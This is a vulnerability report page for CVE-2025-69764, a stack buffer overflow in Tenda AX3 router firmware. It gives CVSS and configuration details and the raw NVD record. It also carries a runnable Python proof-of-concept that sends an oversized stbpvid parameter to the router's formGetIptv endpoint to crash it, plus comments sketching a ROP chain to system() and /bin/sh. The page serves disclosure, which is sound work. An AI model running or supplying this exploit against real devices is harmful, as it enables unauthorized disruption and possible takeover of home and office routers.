Security Vulnerability Report
CVE-2025-69764 CVSS 9.8 CRITICAL

Published: 2026-01-22 16:16:08
Last Modified: 2026-01-26 20:39:23

Description

Tenda AX3 firmware v16.03.12.11 contains a stack-based buffer overflow in the formGetIptv function due to improper handling of the stbpvid stack buffer, which may result in memory corruption and remote code execution.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ax3_firmware:16.03.12.11:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:ax3:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda AX3 firmware v16.03.12.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-69764 PoC - Tenda AX3 formGetIptv Stack Buffer Overflow

This PoC demonstrates the buffer overflow vulnerability in the formGetIptv
function of Tenda AX3 router firmware v16.03.12.11

WARNING: Only use this for authorized security testing
"""

import requests
import sys


def exploit_tenda_ax3(target_ip, target_port=80):
    """
    Exploit CVE-2025-69764 by sending an oversized stbpvid parameter
    to trigger stack buffer overflow in formGetIptv function

    Args:
        target_ip: IP address of the vulnerable Tenda AX3 router
        target_port: Web management port (default: 80)
    """
    # Construct the target URL
    url = f"http://{target_ip}:{target_port}/goform/formGetIptv"

    # Create payload with oversized stbpvid parameter to trigger overflow
    # Buffer size is typically small (e.g., 64-128 bytes), so we send 500+ bytes
    # This will overwrite return address and potentially EIP/RIP
    payload_size = 600
    payload = "A" * payload_size

    # Prepare the POST data
    data = {
        "stbpvid": payload  # Vulnerable parameter
    }

    print(f"[*] Target: {url}")
    print(f"[*] Payload size: {payload_size} bytes")
    print(f"[*] Sending exploit payload...")

    try:
        # Send the malicious request
        response = requests.post(url, data=data, timeout=10)
        print(f"[+] Request sent successfully")
        print(f"[+] Response status: {response.status_code}")
    except requests.exceptions.Timeout:
        print("[!] Request timed out - possible successful exploitation")
        print("[!] Router may have crashed or rebooted")
    except requests.exceptions.ConnectionError:
        print("[!] Connection failed - router may be unresponsive")
        print("[!] This could indicate successful exploitation and device crash")
    except Exception as e:
        print(f"[!] Error: {str(e)}")


def create_rop_payload():
    """
    Generate a more sophisticated ROP payload for actual exploitation
    This would require knowledge of the firmware's memory layout
    """
    # Placeholder for ROP chain construction
    # In a real attack, this would include:
    # - Address of system() function
    # - Address of /bin/sh string
    # - Return address to exit() function
    rop_chain = ""
    return rop_chain


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-69764.py <target_ip> [port]")
        print("Example: python3 cve-2025-69764.py 192.168.0.1 80")
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    exploit_tenda_ax3(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69764", "sourceIdentifier": "[email protected]", "published": "2026-01-22T16:16:07.660", "lastModified": "2026-01-26T20:39:22.757", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tenda AX3 firmware v16.03.12.11 contains a stack-based buffer overflow in the formGetIptv function due to improper handling of the stbpvid stack buffer, which may result in memory corruption and remote code execution."}, {"lang": "es", "value": "El firmware Tenda AX3 v16.03.12.11 contiene un desbordamiento de búfer basado en pila en la función formGetIptv debido a un manejo inadecuado del búfer de pila stbpvid, lo que puede resultar en corrupción de memoria y ejecución remota de código."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ax3_firmware:16.03.12.11:*:*:*:*:*:*:*", "matchCriteriaId": "9FFD11D4-8E44-4156-9D8E-7094E36A2152"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ax3:-:*:*:*:*:*:*:*", "matchCriteriaId": "6A01F4C4-FFFF-48DD-90DB-4DD29FE57479"}]}]}], "references": [{"url": "https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formGetIptv-2c9a595a7aef80e9b90fdaa56f51374b", "source": "[email protected]", 
"tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formGetIptv-2c9a595a7aef80e9b90fdaa56f51374b?source=copy_link", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}